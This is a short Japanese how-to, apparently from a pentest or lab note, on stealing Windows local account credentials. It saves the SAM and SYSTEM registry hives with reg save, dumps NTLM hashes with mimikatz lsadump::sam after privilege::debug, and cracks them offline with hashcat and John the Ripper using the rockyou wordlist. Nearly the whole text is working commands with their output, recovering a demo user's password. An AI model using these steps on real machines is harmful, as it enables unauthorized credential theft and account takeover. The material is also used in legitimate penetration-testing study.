SAMファイルからmimikatzとhashcatでクレデンシャルを入手する
手順
ターゲット上で管理者でコマンドプロンプトを開き、SYSTEMとSAMデータをコピーする
C:\>reg save hklm\sam c:\sam The operation completed successfully. C:\>reg save hklm\system c:\system The operation completed successfully.
mimikatzをダウンロードして(管理者権限で)起動
.#####. mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/
lsadumpでダンプを試みるも、エラーのメッセージ
mimikatz # lsadump::sam /system:c:\system /sam:c:\sam Domain : DESKTOP-AN3UM48 SysKey : a1667ee7bffe3f9433b66f3abeba491a ERROR kuhl_m_lsadump_sam ; CreateFile (SAM hive) (0x00000002)
privilegeをdebugに指定、再度実行すると、NTLMハッシュが手に入る
mimikatz # privilege::debug Privilege '20' OK mimikatz # mimikatz # lsadump::sam /system:c:\system /sam:c:\sam ... RID : 000003ea (1002) User : vul_user Hash NTLM: 259745cb123a52aa2e693aaacca2db52 ...
入手したハッシュ値をハッシュキャット用に作成
$ cat hash.txt 259745cb123a52aa2e693aaacca2db52
hashcatを実行
$ hashcat -m 1000 -a 0 ./hash.txt ./rockyou.txt hashcat (v6.1.1) starting... OpenCL API (OpenCL 1.2 (Nov 23 2020 03:06:15)) - Platform #1 [Apple] ==================================================================== 259745cb123a52aa2e693aaacca2db52:12345678
パスワードを入手
アドバイス
John The Ripperを利用した場合
$ cat hash.txt
vul_user:259745cb123a52aa2e693aaacca2db52
$ /opt/john/run/john --format=nt hash.txt --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
No password hashes left to crack (see FAQ)
$ /opt/john/run/john --show --format=nt hash.txt
vul_user:12345678
1 password hashes cracked, 0 left